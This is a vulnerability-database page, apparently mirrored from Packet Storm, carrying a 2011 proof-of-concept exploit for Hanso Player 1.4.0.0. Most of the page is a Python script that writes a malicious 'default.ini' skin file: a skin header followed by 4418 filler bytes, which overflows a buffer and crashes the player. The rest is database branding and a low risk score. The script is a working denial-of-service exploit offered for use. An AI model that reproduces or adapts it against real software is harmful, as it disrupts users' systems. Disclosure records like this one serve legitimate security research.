Lucene search
K

Hanso Player 1.4.0.0 Buffer Overflow

🗓️ 07 Feb 2011 00:00:00Reported by badc0reType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 23 Views

Hanso Player 1.4.0.0 Buffer Overflow - DoS Skinfile Exploit

Code
`# Exploit Title: Hanso Player 1.4.0.0 Buffer Overflow - DoS Skinfile  
# Date: 05.02.2011  
# Author: Dame Jovanoski(badc0re)  
# Software Link: http://www.hansotools.com/downloads/hanso-player-setup.exe  
# Version: 1.4.0.0  
# Tested on: XP sp3  
  
from struct import *  
import time  
  
f=open("default.ini","w")  
print "Creating expoit."  
time.sleep(1)  
print "Creating explot.."  
time.sleep(1)  
print "Creating explot..."  
  
junk="\x41"*4418  
  
head=("\x5B\x48\x61\x6E\x73\x6F\x20\x50"  
"\x6C\x61\x79\x65\x72\x20\x53\x6B"  
"\x69\x6E\x5D\x0A")  
try:   
f.write(head+junk)   
f.close()  
print "File created"  
except:  
print "File cannot be created"  
  
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

07 Feb 2011 00:00Current
1Low risk
Vulners AI Score1
23